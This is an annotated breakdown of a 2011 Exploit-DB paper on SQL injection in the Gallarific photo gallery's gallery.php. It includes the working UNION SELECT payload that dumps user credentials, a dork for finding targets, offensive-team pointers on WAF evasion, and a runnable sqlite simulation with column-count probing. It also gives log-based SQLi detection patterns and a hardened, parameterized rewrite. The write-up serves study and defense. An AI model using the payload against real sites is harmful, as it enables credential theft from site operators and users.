Exploiting SQL Injection in Gallarific PHP Photo Gallery

What this paper is
This paper details a SQL injection vulnerability found in the gallery.php script of the Gallarific PHP Photo Gallery. The vulnerability allows an attacker to extract user credentials (username and password) from the gallarific_users table.
Simple technical breakdown
The vulnerability lies in how the gallery.php script handles the id parameter passed via the URL. The value is placed into a SQL query without validation or parameterization, so whatever the attacker appends to id becomes part of the query the database runs. Here the appended SQL is a UNION SELECT: it adds a row of the attacker's choosing to the original result set, and because gallery.php renders that result set, the attacker's row is printed on the page, leaking data from a table the script was never meant to read.
Complete code and payload walkthrough
The provided exploit snippet demonstrates a classic SQL injection technique.
Exploit Snippet:
www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8+from+gallarific_users--

Let's break this down:
- www.site.com/gallery.php?id=: the target script and the vulnerable parameter.
- null: takes the place of a normal numeric id. It matches no gallery row, which is the first step toward making the original query contribute nothing to the output.
- +and+1=2: makes the original WHERE clause false outright. The page then has no legitimate row to render, so the only row it displays is the one the injected SELECT produces. (This is not what makes the UNION valid; that is the column count, handled next.)
- union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8: the core of the attack.
  - union select: appends the rows of the injected SELECT to the (now empty) result of the original query.
  - 1,3,4,5,6,7,8: placeholder values. Together with the group_concat column they must equal the number of columns the original query selects, or the database rejects the UNION with an error. The payload implies that query selects 8 columns and that the second column is one gallery.php prints, which is why the interesting data is placed there.
  - group_concat(userid,0x3a,username,0x3a,password): the most important part. group_concat() is a MySQL aggregate function that joins one string per row into a single comma-separated string, so every user record comes back in one row and one page load.
  - userid, username, password: column names from the gallarific_users table. Whether the password column holds cleartext or a hash depends on how the application stores it; the paper does not say.
  - 0x3a: the hexadecimal literal for the colon character (:), used as a delimiter between the extracted fields. Writing it as 0x3a rather than ':' keeps quote characters out of the payload, so quote-escaping on its own would not have stopped it.
- +from+gallarific_users: the table the credentials are read from.
- --: a SQL comment marker. It discards whatever the original query appended after the id (an ORDER BY, a LIMIT and so on), preventing syntax errors so that only the injected query is executed. Note that MySQL treats -- as a comment only when it is followed by whitespace or the end of the statement; if the rest of the original query follows without a space, --+ (which decodes to "-- ") or # is the usual fallback.
Mapping of code fragment/block to practical purpose:
- www.site.com/gallery.php?id=null: target URL and vulnerable parameter.
- +and+1=2: suppress the original query's rows so only the injected row is displayed.
- union+select+1, ..., 8: inject a new query to retrieve data, matching the original query's column count.
- group_concat(userid,0x3a,username,0x3a,password): extract and format user credentials from the gallarific_users table.
- +from+gallarific_users: specify the target table for data extraction.
- --: comment out the rest of the original query to avoid syntax errors.
Payload/Shellcode:
There is no executable shellcode or payload in the traditional sense (like a reverse shell or meterpreter). The "payload" here is the crafted SQL query itself, which manipulates the database to exfiltrate data. The output of this query, when executed by the web server, will be displayed in the web browser as part of the gallery.php page's output.
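The mechanics above, as an added example that is not code from the paper or from Gallarific: a sqlite3 stand-in for the vulnerable gallery.php query that concatenates the raw id into SQL the way the paper implies, so the payload can be watched working and the column count can be found the way a tester would. The gallery table name and its 8 columns, the sample users and the database engine are assumptions (the real target is MySQL; the two sqlite adaptations of MySQL syntax are marked in the code).

```python
# Added example, not code from the Exploit-DB paper or from Gallarific.
# A sqlite3 stand-in for the vulnerable gallery.php query: the raw id value is
# concatenated into SQL exactly as the paper implies.  Assumptions: the gallery
# table name/columns (the paper only implies 8 columns), the constructed sample
# users, and two sqlite adaptations of MySQL syntax marked below.
import sqlite3

# The payload from the paper, URL-decoded (+ -> space).
PAYLOAD_MYSQL = ("null and 1=2 union select 1,"
                 "group_concat(userid,0x3a,username,0x3a,password),"
                 "3,4,5,6,7,8 from gallarific_users--")

# sqlite adaptation: sqlite's group_concat() takes one expression and 0x3a is
# an integer literal there, so the per-row fields are joined with || instead.
PAYLOAD_SQLITE = ("null and 1=2 union select 1,"
                  "group_concat(userid||':'||username||':'||password),"
                  "3,4,5,6,7,8 from gallarific_users--")


def build_db():
    """In-memory database with constructed sample data (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gallarific_users(userid INTEGER, username TEXT, password TEXT);
        INSERT INTO gallarific_users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
        CREATE TABLE gallarific_galleries(
            id INTEGER, name TEXT, description TEXT, folder TEXT,
            thumb TEXT, views INTEGER, added TEXT, owner INTEGER);
        INSERT INTO gallarific_galleries VALUES (1, 'Holiday', 'pics', 'h', 't', 0, '2011-01-02', 1);
    """)
    return db


def vulnerable_query(db, raw_id):
    """Mimics the bug: the id value goes into the SQL string unchanged."""
    sql = "SELECT * FROM gallarific_galleries WHERE id=" + raw_id
    return db.execute(sql).fetchall()


def find_column_count(db, max_cols=16):
    """UNION SELECT null,null,... with one more null each time; the first probe
    the database accepts reveals how many columns the original query selects."""
    for n in range(1, max_cols + 1):
        probe = "null union select " + ",".join(["null"] * n) + "--"
        try:
            vulnerable_query(db, probe)
            return n
        except sqlite3.OperationalError:  # column count mismatch
            continue
    return None


def exfiltrate(db):
    """Runs the paper's payload; the original WHERE is false, so the only row
    returned is the injected one, and column 2 carries the credentials."""
    rows = vulnerable_query(db, PAYLOAD_SQLITE)
    return rows[0][1]


if __name__ == "__main__":
    db = build_db()
    print("columns:", find_column_count(db))
    print("leaked :", exfiltrate(db))
```

On MySQL the same probing is usually done with ORDER BY n (it errors once n exceeds the column count) or with the UNION SELECT NULL,... form shown here; sqlmap automates exactly this loop.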
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No authentication to the web application is required for this injection, though authenticated access might be needed to reach the gallery.php page if the site restricts it.
- Lab Preconditions:
  - A vulnerable Gallarific PHP Photo Gallery installation.
  - A database backend (MySQL, judging by the group_concat function and the 0x3a literal) accessible by the web application.
  - The gallarific_users table must exist and contain user credentials.
  - The gallery.php script must be reachable and must place the id parameter into its query without validation or parameterization.
- Tooling Assumptions:
  - A web browser for manual testing or sending requests.
  - A proxy tool (like Burp Suite or OWASP ZAP) is highly recommended for intercepting, modifying, and replaying HTTP requests.
  - SQL injection tools (like sqlmap) can automate the discovery and exploitation of this vulnerability, but understanding the manual process is crucial.
- Execution Pitfalls:
  - Column Count Mismatch: the union select statement requires the number of selected columns to match the original query. If the original query selects a different number of columns, the database rejects the UNION and the page shows an error or nothing. The count is found by probing: ORDER BY n until it errors, or UNION SELECT null,null,... with an increasing number of nulls until it succeeds; sqlmap does this automatically.
  - Database Type/Version: group_concat and 0x.. hex literals are MySQL syntax. Other engines need different aggregation (string_agg in PostgreSQL, for example) and different string handling, so this exact payload is specific to MySQL.
  - WAF/IDS Evasion: Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the SQL injection patterns. Evasion techniques (like encoding, using different delimiters, or obfuscating keywords) might be necessary.
  - URL Encoding: spaces and special characters in the URL must be URL-encoded (e.g., a space becomes %20). The exploit snippet uses + for spaces, which is the application/x-www-form-urlencoded form of a space in a query string.
  - Output Filtering: the extracted data might be filtered, truncated or HTML-encoded by the application before being displayed, making it harder to read. MySQL also caps group_concat output at group_concat_max_len (1024 bytes by default), so a large user table comes back truncated.
- Telemetry:
  - Web Server Logs: unusual GET requests to gallery.php with long query strings containing SQL keywords (union, select, group_concat, from, --) or hex literals such as 0x3a. Because of the + and %20 encodings, matching should be done on the URL-decoded query string.
  - Database Logs: queries that deviate from normal application behaviour, especially those involving UNION SELECT and reading the gallarific_users table from a code path that only serves galleries.
  - Application Errors: SQL syntax errors or unexpected output on the web page if the injection is not perfectly crafted; column-count probing in particular produces a burst of failed requests from one client shortly before the working payload.
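The web-server-log telemetry above, turned into detection logic as an added example (not part of the paper): the access-log lines are constructed, the log format is Apache combined, and the indicator patterns follow the payload on this page. Matching runs on the URL-decoded query so that + and %20 encodings do not hide the keywords.

```python
# Added example, not part of the paper: a detector for the web-server-log
# telemetry described above, run over constructed Apache combined-log lines.
# The log lines are made up; the patterns follow the payload on this page.
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log: a normal view, a null probe, the paper's payload,
# a column-count probe that errored (500), and an unrelated admin-panel hit.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jan/2011:10:14:02 +0000] "GET /gallery.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2011:10:14:09 +0000] "GET /gallery.php?id=null HTTP/1.1" 200 311 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2011:10:14:31 +0000] "GET /gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8+from+gallarific_users-- HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2011:10:15:03 +0000] "GET /gallery.php?id=null%20union%20select%20null,null,null-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.2 - - [02/Jan/2011:10:16:44 +0000] "GET /gadmin/index.php HTTP/1.1" 200 904 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# All patterns run on the URL-decoded query string.
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "tautology":    re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "comment_tail": re.compile(r"(--|#|/\*)\s*$"),
    "hex_literal":  re.compile(r"\b0x[0-9a-f]{2,}", re.I),
}


def classify(line):
    """Parses one log line and returns the decoded query plus pattern hits."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = unquote_plus(parts.query)
    hits = [name for name, pat in SQLI_PATTERNS.items() if pat.search(query)]
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "status": int(m.group("status")),
        "query": query,
        "hits": hits,
        # a UNION SELECT alone is enough; otherwise require two indicators
        "suspicious": "union_select" in hits or len(hits) >= 2,
    }


def scan(log_text):
    """Returns the suspicious requests in order of appearance."""
    events = (classify(line) for line in log_text.splitlines() if line.strip())
    return [e for e in events if e and e["suspicious"]]


if __name__ == "__main__":
    for e in scan(SAMPLE_LOG):
        print(e["ip"], e["status"], e["path"], e["hits"])
```

The 500 on the column-count probe is the "Application Errors" signal from the list above; grouping flagged requests by client IP and time shows the probe-then-payload sequence an attacker leaves behind.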
Where this was used and when
- Context: This exploit targets the Gallarific PHP Photo Gallery script, a web application designed for displaying photo galleries. The vulnerability would be exploited by an attacker targeting websites using this specific script.
- Approximate Years/Dates: The paper was published on January 2, 2011. Therefore, this vulnerability was likely discovered and potentially exploited around or before this date. It represents a common type of web vulnerability prevalent in the late 2000s and early 2010s.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the cornerstone of preventing SQL injection. All user-supplied input, especially data used in database queries, must be rigorously validated and sanitized.
- Parameterized Queries (Prepared Statements): This is the most effective defense. Instead of concatenating user input into SQL strings, use parameterized queries where the SQL command and the data are sent separately. The database engine then treats the input strictly as data, not executable code.
- Input Whitelisting: Only allow known-good characters or patterns for specific input fields.
- Escaping Special Characters: Properly escape characters that have special meaning in SQL (e.g., single quotes, double quotes, backslashes) when a value must be placed into a string literal and a parameter cannot be used. This is a fallback, not a substitute for parameterized queries: the payload on this page contains no quotes at all (0x3a instead of ':'), so quote-escaping would not have stopped it. A numeric id must be validated as an integer or bound as a parameter.
- Least Privilege Principle: The database user account used by the web application should have only the minimum necessary permissions. It should not have privileges to drop tables, create new users, or access sensitive system tables if it only needs to read gallery data.
- Web Application Firewalls (WAFs): While not a silver bullet, WAFs can provide a layer of defense by detecting and blocking common SQL injection patterns. However, they can be bypassed.
- Regular Security Audits and Patching: Keep all web applications and their dependencies updated. Regularly audit code for vulnerabilities.
- Error Handling: Configure web applications to display generic error messages to users instead of detailed database error messages, which can reveal information useful to attackers.
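The lessons above applied to the gallery lookup, as an added example that is not the project's code: an integer whitelist for id, a parameterized query, a read-only database connection for least privilege, and a generic error to the caller. It uses sqlite3 so it runs stand-alone; the table and column names and the sample rows are assumptions, and the payload is the paper's, adapted to sqlite syntax.

```python
# Added example, not the project's code: the gallery lookup rewritten with the
# defences above (integer whitelist, parameterized query, read-only database
# connection, generic error to the caller), on sqlite3 so it runs stand-alone.
# Table and column names and the sample rows are assumptions.
import os
import sqlite3
import tempfile
from pathlib import Path

# The paper's payload, adapted to sqlite syntax (|| instead of 0x3a delimiters).
PAYLOAD = ("null and 1=2 union select 1,"
           "group_concat(userid||':'||username||':'||password),"
           "3,4,5,6,7,8 from gallarific_users--")


class GalleryError(Exception):
    """Raised with a generic message; the real database error stays server-side."""


def parse_gallery_id(raw):
    """Input whitelist: a gallery id is a positive ASCII decimal integer, nothing else."""
    if not (raw.isascii() and raw.isdecimal()):
        raise GalleryError("invalid gallery id")
    gid = int(raw)
    if not 0 < gid < 2**31:
        raise GalleryError("invalid gallery id")
    return gid


def lookup_gallery(db, raw_id):
    """Validate first, then bind: the value never touches the SQL text."""
    gid = parse_gallery_id(raw_id)
    try:
        return db.execute(
            "SELECT id, name FROM gallarific_galleries WHERE id = ?", (gid,)
        ).fetchone()
    except sqlite3.Error:
        # log the detailed error server-side; never echo it to the browser
        raise GalleryError("gallery unavailable")


def lookup_param_only(db, raw_id):
    """Parameterization alone: even without the whitelist the payload is just data."""
    return db.execute(
        "SELECT id, name FROM gallarific_galleries WHERE id = ?", (raw_id,)
    ).fetchone()


def open_readonly(path):
    """Least privilege: the page only reads galleries, so it gets a read-only handle."""
    return sqlite3.connect(Path(path).as_uri() + "?mode=ro", uri=True)


def demo():
    """Builds a file database, exercises each defence and returns the outcomes."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "gallery.db")
        setup = sqlite3.connect(path)
        setup.executescript("""
            CREATE TABLE gallarific_users(userid INTEGER, username TEXT, password TEXT);
            INSERT INTO gallarific_users VALUES (1, 'admin', 's3cret');
            CREATE TABLE gallarific_galleries(id INTEGER, name TEXT);
            INSERT INTO gallarific_galleries VALUES (1, 'Holiday');
        """)
        setup.commit()
        setup.close()

        db = open_readonly(path)
        out = {"normal": lookup_gallery(db, "1")}
        try:
            lookup_gallery(db, PAYLOAD)
            out["whitelist"] = "allowed"
        except GalleryError as e:
            out["whitelist"] = str(e)
        out["param_only"] = lookup_param_only(db, PAYLOAD)
        try:
            db.execute("DELETE FROM gallarific_users")
            out["write"] = "allowed"
        except sqlite3.OperationalError:
            out["write"] = "denied"
        db.close()
        return out


if __name__ == "__main__":
    print(demo())
```

With a real MySQL backend the equivalent of open_readonly is a dedicated database account granted only SELECT on the gallery tables, and the equivalent of the bound ? is a PDO or mysqli prepared statement in the PHP.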
ASCII visual (if applicable)
This vulnerability is a direct manipulation of data flow. An ASCII visual might look like this:
+-----------------+      +-----------------+      +-------------------+
| Attacker (User) |----->|   Web Server    |----->|  Database Server  |
+-----------------+      |  (gallery.php)  |      | (gallarific_users)|
                         +-------+---------+      +-------------------+
                                 |
                                 | (Vulnerable 'id' parameter)
                                 |
                         +-------v---------+
                         |  Malicious SQL  |
                         |    Injection    |
                         +-----------------+
                                 |
                                 | (Data Exfiltration)
                                 |
                         +-------v---------+
                         | Sensitive Data  |
                         | (Usernames,     |
                         |  Passwords)     |
                         +-----------------+
Source references
- Paper Title: GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection
- Author: AtT4CKxT3rR0r1ST
- Published: 2011-01-02
- Exploit-DB Paper ID: 15891
- URL: https://www.exploit-db.com/papers/15891
Original Exploit-DB Content (Verbatim)
GALLARIFIC PHP Photo Gallery Script (gallery.php) Sql Injection Vulnerability
=================================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.gallarific.com/download.php
.:. Dork : inurl:"/gadmin/index.php"
####################################################################
===[ Exploit ]===
www.site.com/gallery.php?id=null[Sql Injection]
www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8+from+gallarific_users--
===[ Admin Panel ]===
www.site.com/gadmin/index.php
####################################################################